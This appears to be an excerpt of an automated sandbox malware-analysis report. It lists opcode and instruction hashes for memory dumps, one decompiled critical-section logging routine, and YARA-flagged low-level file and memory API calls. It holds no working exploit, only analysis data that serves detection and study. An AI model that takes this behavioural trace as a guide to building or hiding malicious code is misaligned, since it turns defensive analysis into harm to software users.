                • Instruction Fuzzy Hash: 46C08C30290A01AAFB221F24CD02B403AA0BB11B01F4800A06301DA0F0DB78DA01E600
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                • Instruction ID: 76156d632a3fa94d9292c4c5d7605338698ef5f29ede795178ef3bd09459591f
                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                • Instruction Fuzzy Hash: 03C01232080248BBCB126E85CC01F467B2AEBA4B60F008010BA080A6608632EA70EA84
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                • Instruction ID: c6cb2cd1332f6a02bddff71fdd8a5c98024fc24532fe4ec80bd7ea2d2b15a405
                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                • Instruction Fuzzy Hash: C4C08C32080248BBC7126E45DC01F057B29E7A0B60F000020B6040A6618532ED60D588
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                • Instruction ID: e8f3d5f341e16a876ba7111fa95d2da981c91b126261d36e45d457d1d7e7cd7d
                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                • Instruction Fuzzy Hash: 93C08C32080288BBC7126A49CD40F017B29E7A0B60F000020B6044A6A18932E960D588
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                • Instruction ID: 94fc709819e624253beaa8d469cc762e45935ecbf966bca6735a4eff413ee5a4
                • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                • Instruction Fuzzy Hash: 55C02B70150440FBEB151F34CD41F187254F700F21F6403587221C55F0D538DD00E100
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                • Instruction ID: d107c3604a7a47b2d71c5220e2c1c456e3583359b5a0be61b6798d3c326481dd
                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                • Instruction Fuzzy Hash: 0DC08C701412C45BFB2A570CCE20B203A50AB08708F88019CAA018D5E2C3AAAA02D208
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                • Instruction ID: e39dc9746dbe99fc0f65fb7774de5c6df28c0df52489d6876b92f0c8624a40bf
                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                • Instruction Fuzzy Hash: 49B09235302A808FCF16DF18C080B5533E4BB84B80B8800D4E400CBA21D229E9008900
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                • Instruction ID: 5e9ae34d1107f24a745ad97fb9f2a3dc3a5584acf2df5aeff67f787e5a5de384
                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                • Instruction Fuzzy Hash: 21B01232C11441CFCF02EF44C660B197331FB00750F054890900177930C228AD02CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eefc3c04105d0b1f7d2552d7af1c5bcb400a2a1fe17590d2172a72c27184a45f
                • Instruction ID: bd1204730c0d040fc4552fb4209e745f88e35b31929a501f476ed80069784b71
                • Opcode Fuzzy Hash: eefc3c04105d0b1f7d2552d7af1c5bcb400a2a1fe17590d2172a72c27184a45f
                • Instruction Fuzzy Hash: F09002A121100042D104619944087160085A7E2381F51C112A7148664CC5698D796165
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 950993c263d7962c4e73be7fbb351173be4153e17a41888fb096b1ee065006a7
                • Instruction ID: b12c667b5cd512ac3b3df9e79d3c9b1a6f302423d948f8502544ffdd0b59ca6e
                • Opcode Fuzzy Hash: 950993c263d7962c4e73be7fbb351173be4153e17a41888fb096b1ee065006a7
                • Instruction Fuzzy Hash: E19002A120140403D140659948086170045A7D1382F51C111A7058665ECA698D697175
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7be892010d5a6db64bd00f963fab0c838ded79ba1604336773f694e051d9a942
                • Instruction ID: b3b4d7e0e4110cb987a27c8ded8faf8eb0469e494d0db8338dda2ad01e032850
                • Opcode Fuzzy Hash: 7be892010d5a6db64bd00f963fab0c838ded79ba1604336773f694e051d9a942
                • Instruction Fuzzy Hash: 0B90026130100402D102619944186160049E7D23C5F91C112E6418665DC6658A6BB172
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ec4f9bc9b1e40591e41e8238e034f15755daeb3629e3f6bd230719259231f240
                • Instruction ID: a45867ca8d7b93e985584579308251a29f3c900c057f0dee63a2092ec327e118
                • Opcode Fuzzy Hash: ec4f9bc9b1e40591e41e8238e034f15755daeb3629e3f6bd230719259231f240
                • Instruction Fuzzy Hash: A890027124100402D141719944086160049B7D13C1F91C112A5418664EC6958B6EBAA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ce318ee42a3deacaf5c8b86729864c852723b976174784030c56248a8c71b3ab
                • Instruction ID: fd8eac320e7c85180e432450d89b5adc067d420f452904b3366649ba868150f2
                • Opcode Fuzzy Hash: ce318ee42a3deacaf5c8b86729864c852723b976174784030c56248a8c71b3ab
                • Instruction Fuzzy Hash: DC9002A1601140434540B19948084165055B7E2381391C221A5448670CC6A8896DA2A5
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7f35ddbcdeb86bbd7cd53a71a9eb82b573c5e7593e14400f710113eb5dfd0977
                • Instruction ID: 60879254f4dce77215baaa58b5ef322e0dc01fa4294532b92b4409c91d5f8138
                • Opcode Fuzzy Hash: 7f35ddbcdeb86bbd7cd53a71a9eb82b573c5e7593e14400f710113eb5dfd0977
                • Instruction Fuzzy Hash: 5C90027120144002D1407199844861B5045B7E1381F51C511E5419664CC655896EA261
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 79963a05b2db0769312c946b6c76f4b49b459b690fee73a6cd43c4624b2e4151
                • Instruction ID: c34ad746855ddc18a8e82bf7354af4e4c5b17ccb9e3075bf5b716d93701db543
                • Opcode Fuzzy Hash: 79963a05b2db0769312c946b6c76f4b49b459b690fee73a6cd43c4624b2e4151
                • Instruction Fuzzy Hash: 5A90026124100802D140719984187170046E7D1781F51C111A5018664DC6568A7D76F1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5545f04fe6d51fc7e9312fef755df04b8bf37b151dc422c84da54ba0539151d1
                • Instruction ID: 91968a5095059730241b073b04e7b2e4a9e06d4be4f3047325c06f9067227b9d
                • Opcode Fuzzy Hash: 5545f04fe6d51fc7e9312fef755df04b8bf37b151dc422c84da54ba0539151d1
                • Instruction Fuzzy Hash: 9090026120144442D14062994808B1F4145A7E2382F91C119A914A664CC955896D6761
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c5077cd0272ac419251021b04f995e2d2c87fd91930c90b727f62e575d528d2f
                • Instruction ID: 2cf3fd64b464971903909d1949d60d66a9abc8bb29f4f320b609942e7b2cb07a
                • Opcode Fuzzy Hash: c5077cd0272ac419251021b04f995e2d2c87fd91930c90b727f62e575d528d2f
                • Instruction Fuzzy Hash: 4290027120140402D1006199480C7570045A7D1382F51C111AA158665EC6A5C9A97571
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0f6e7ecb75b9bad78e624129ca25ac6b2cde47b477a1b8cb181c86a260967280
                • Instruction ID: b4f5184c1814633a9c0e37445e0277d6b40cbcafc6e692f00f6057b44de8a984
                • Opcode Fuzzy Hash: 0f6e7ecb75b9bad78e624129ca25ac6b2cde47b477a1b8cb181c86a260967280
                • Instruction Fuzzy Hash: 0590027120100802D104619948086960045A7D1381F51C111AB018765ED6A589A97171
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c1e6c00962674235f8b81f7c95f5c0c84af77041aa8d89a657990e4e85fce4bb
                • Instruction ID: abb28047a4b65fa6a75dea74c90990a5679c88bdf8ea4c666089f3ed10f85c5d
                • Opcode Fuzzy Hash: c1e6c00962674235f8b81f7c95f5c0c84af77041aa8d89a657990e4e85fce4bb
                • Instruction Fuzzy Hash: BD9002E1201140924500A2998408B1A4545A7E1381B51C116E6048670CC5658969A175
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 53a0c7ad794f226bcc1f929890a98ae3b71e9fc86b284c3ea39cfe6fa74f8aed
                • Instruction ID: 90db868ac1da76c0fd97485ea944bc5a41f1b018228acc47b38f7a5aba386e94
                • Opcode Fuzzy Hash: 53a0c7ad794f226bcc1f929890a98ae3b71e9fc86b284c3ea39cfe6fa74f8aed
                • Instruction Fuzzy Hash: 9E900271A05000129140719948186564046B7E17C1B55C111A5508664CC9948B6D63E1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7f6ac2a89500d7db7d5c3c459ee30ca2d06950321bc7908b22a6028de89b6200
                • Instruction ID: 14a718c78006cf1e8df464737b2ac41771e936b093f08341da3c82a27e74b0c0
                • Opcode Fuzzy Hash: 7f6ac2a89500d7db7d5c3c459ee30ca2d06950321bc7908b22a6028de89b6200
                • Instruction Fuzzy Hash: 75900265221000020145A599060851B0485B7D73D1391C115F640A6A0CC661897D6361
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 788418f73fb5d7f7c338ff424bb53dbb3b431a65d2cf7afbcca3eac1343fcc36
                • Instruction ID: 07c35e9c387a935c82e539be96f6b0b9c27f12a0edf3e1939e53d4ba48f64031
                • Opcode Fuzzy Hash: 788418f73fb5d7f7c338ff424bb53dbb3b431a65d2cf7afbcca3eac1343fcc36
                • Instruction Fuzzy Hash: E7900271301000529500A6D95808A5A4145A7F1381B51D115A9008664CC59489796161
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9ae8d50b82b97f076a051c7b5260167dbaa6ed4d92e39e38d21e526352566475
                • Instruction ID: b9a2edf42df7279d00c6d2fd6e7432e236706e1a86a082a4141c2e19a52186cd
                • Opcode Fuzzy Hash: 9ae8d50b82b97f076a051c7b5260167dbaa6ed4d92e39e38d21e526352566475
                • Instruction Fuzzy Hash: D590026160500402D1407199541C7160055A7D1381F51D111A5018664DC6998B6D76E1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c22a4a1f7bf6f2ab1fd1b1fb9ac79ec1f14ea4deacd160a9084166dec448fb4e
                • Instruction ID: 53321ca8b4f196fd1101a15e274d4cf6aadd8500fcf81bdacf798d8f1c9c6f3e
                • Opcode Fuzzy Hash: c22a4a1f7bf6f2ab1fd1b1fb9ac79ec1f14ea4deacd160a9084166dec448fb4e
                • Instruction Fuzzy Hash: D390027120100403D1006199550C7170045A7D1381F51D511A5418668DD69689697161
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43e4785153d5c09b1d0ad7b27ffffddafb676afafad1cb98b8cf4e06211e6b85
                • Instruction ID: a68b9a73b4f58e223c00397e911b9f2647d7fd94f7bde252f19a3a3d2430fd3f
                • Opcode Fuzzy Hash: 43e4785153d5c09b1d0ad7b27ffffddafb676afafad1cb98b8cf4e06211e6b85
                • Instruction Fuzzy Hash: 4590027520504442D50065995808A970045A7D1385F51D511A54186ACDC6948979B161
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b88a848dfbf260de66fc5693580924a55f251c62c2c666678096632e0e68cfe8
                • Instruction ID: 706adae81fac1b69c5ee255f0a8a3f0fc95bd063adde910edbde5ca7b5747946
                • Opcode Fuzzy Hash: b88a848dfbf260de66fc5693580924a55f251c62c2c666678096632e0e68cfe8
                • Instruction Fuzzy Hash: FF90026120504442D1006599540CA160045A7D1385F51D111A60586A5DC6758969B171
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0a923c46b965ce52736a3de43dbef233b154a0edb949007e9ed1b4d5c37c70db
                • Instruction ID: 7cf915b3097cdc123662fa6e205cee90e65e36a55c402b6ec24c1ef5789a9d81
                • Opcode Fuzzy Hash: 0a923c46b965ce52736a3de43dbef233b154a0edb949007e9ed1b4d5c37c70db
                • Instruction Fuzzy Hash: 6E90027120100842D10061994408B560045A7E1381F51C116A5118764DC655C9697561
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ea1cef02c4943878e00aceac6ae498df6fd84e89a518a53eac03b806664fea84
                • Instruction ID: e2a77e1934ce7ececd105d68d442883546b4a4eb8a10d563cd1aa91e7de36d55
                • Opcode Fuzzy Hash: ea1cef02c4943878e00aceac6ae498df6fd84e89a518a53eac03b806664fea84
                • Instruction Fuzzy Hash: B690027160500802D150719944187560045A7D1381F51C111A5018764DC7958B6D76E1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cb82983557f169fdba74634df085042186f316df56db7b112d7bfa69c6dba578
                • Instruction ID: 8e1f1e5186a7c5c7f42f8fe7f7c89c2d5871950250e4acaace7811e7fde50848
                • Opcode Fuzzy Hash: cb82983557f169fdba74634df085042186f316df56db7b112d7bfa69c6dba578
                • Instruction Fuzzy Hash: 9590027120504842D14071994408A560055A7D1385F51C111A50587A4DD6658E6DB6A1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction ID: 70a30b0483fc1539411757e17cdb1b0216f8cd4f454f0515a8d01e42126d9416
                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E0192FDDA(intOrPtr* __edx, intOrPtr _a4) {
                				void* _t7;
                				intOrPtr _t9;
                				intOrPtr _t10;
                				intOrPtr* _t12;
                				intOrPtr* _t13;
                				intOrPtr _t14;
                				intOrPtr* _t15;
                
                				_t13 = __edx;
                				_push(_a4);
                				_t14 =  *[fs:0x18];
                				_t15 = _t12;
                				_t7 = E018DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                				_push(_t13);
                				E01925720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                				_t9 =  *_t15;
                				if(_t9 == 0xffffffff) {
                					_t10 = 0;
                				} else {
                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                				}
                				_push(_t10);
                				_push(_t15);
                				_push( *((intOrPtr*)(_t15 + 0xc)));
                				_push( *((intOrPtr*)(_t14 + 0x24)));
                				return E01925720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                			}

                Instruction addresses: 0x0192fdda, 0x0192fde2, 0x0192fde5, 0x0192fdec, 0x0192fdfa, 0x0192fdff, 0x0192fe0a, 0x0192fe0f, 0x0192fe17, 0x0192fe1e, 0x0192fe19, 0x0192fe19, 0x0192fe19, 0x0192fe20, 0x0192fe21, 0x0192fe22, 0x0192fe25, 0x0192fe40

                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0192FDFA
                Strings
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0192FE01
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0192FE2B
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                • API String ID: 885266447-3903918235
                • Opcode ID: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
                • Instruction ID: 369415b27afc16e7d6872bb818ceb05f4d4aba4e702e6cd65eacb19685f711be
                • Opcode Fuzzy Hash: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
                • Instruction Fuzzy Hash: 5EF0C272240211BBEA212A45DC02E73BB6AEB84B30F150218F628961D5DA62B920D7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                APIs
                • NtCreateFile.NTDLL(00000060,00000000,.z`,00E43BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00E43BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00E4861D
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID: .z`
                • API String ID: 823142352-1441809116
                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                • Instruction ID: 598b12c5a8eb2a25b571348eea47fd7958f70076e262bd85b25fc5c8e6362ed9
                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                • Instruction Fuzzy Hash: B5F0B6B2201108ABCB08CF88DC85DEB77EDAF8C754F158248BA0D97241C630F811CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 00E486C5
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID: !:
                • API String ID: 2738559852-3508929463
                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                • Instruction ID: 85384e813e033d7cca201986ae1e708c49752ed2f2f88cd68bd52243c2055429
                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                • Instruction Fuzzy Hash: 7DF0A9B2200108ABCB14DF89DC85DEB77ADAF8C754F158248BE1DA7241D630E811CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtClose.NTDLL(@=,?,?,00E43D40,00000000,FFFFFFFF), ref: 00E48725
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: Close
                • String ID: @=
                • API String ID: 3535843008-3903022579
                • Opcode ID: 61182b11db2d7552614c58ca564ddd2d696feec7f905b6039e2ae723062ea69f
                • Instruction ID: 0b5e9c752ebafb3c39902b6b482e746ed1620a868fee78d40ea79a741586cfad
                • Opcode Fuzzy Hash: 61182b11db2d7552614c58ca564ddd2d696feec7f905b6039e2ae723062ea69f
                • Instruction Fuzzy Hash: 3EE086366001146BD710DBA9DC45EDBBB58DF94250F154159FA5DE7242C170A50086E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtClose.NTDLL(@=,?,?,00E43D40,00000000,FFFFFFFF), ref: 00E48725
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: Close
                • String ID: @=
                • API String ID: 3535843008-3903022579
                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                • Instruction ID: 05518512dcb5260cc45ee6b3878bf917af602c4f536a89fd77eab75f83d1ef57
                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                • Instruction Fuzzy Hash: 31D01776200218ABD714EB98DC89EA77BACEF48760F154599BA58AB242C570FA0086E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00E32D11,00002000,00003000,00000004), ref: 00E487E9
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: 01916af0e9a45fd77855f74bde9be3ebc2cff63e1be6a2fffa5b937ed38355cc
                • Instruction ID: 7597d2399068e03e2b5e6a0aaffcdf3d1bc1c5160d949a33f7743eed5779bb53
                • Opcode Fuzzy Hash: 01916af0e9a45fd77855f74bde9be3ebc2cff63e1be6a2fffa5b937ed38355cc
                • Instruction Fuzzy Hash: 62F058B1200208AFCB14DF98DC91EE777A8AF8C710F158148FE48AB341C630E811CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00E32D11,00002000,00003000,00000004), ref: 00E487E9
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                • Instruction ID: a5780e5f04c1df3eb0e3fca84d71d741c1f6553200882c56f55496816e8ed347
                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                • Instruction Fuzzy Hash: E0F01CB1200208ABCB14DF89DC81EA777ADAF88750F118148BE08A7241C630F810CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 8a38a3c2d5a28c1a54ff7f45754b823841d070909846f286e4de960be2f9296c
                • Instruction ID: 6b25fa7830fee6fd39e4878a760f60eff454eadb0913811af90f27dd9e16c644
                • Opcode Fuzzy Hash: 8a38a3c2d5a28c1a54ff7f45754b823841d070909846f286e4de960be2f9296c
                • Instruction Fuzzy Hash: 54900265711004030105A55A0754647006697D5391391C022F1005550CDB6188616162
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 2498d521ed525e8ab95c27793be25ffa3c14a010ebf440aa6c983bf85fe8f11a
                • Instruction ID: d3ebf8c433446eb33e79962d68f929fd3ed2d5b15071757cb4c5ae42241162d0
                • Opcode Fuzzy Hash: 2498d521ed525e8ab95c27793be25ffa3c14a010ebf440aa6c983bf85fe8f11a
                • Instruction Fuzzy Hash: 919002A1702004034105715A4464756402A97E0241B91C022E1004590DCA6588917166
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: cbf47a9814421083680ef4e7d8db2a14114669e4e891f84e3afe25d3ef3976f3
                • Instruction ID: 19b4e7f3ab2a1e9ec2d7999b8316cb0574933d8dfeb28b76143fb5397c80dee0
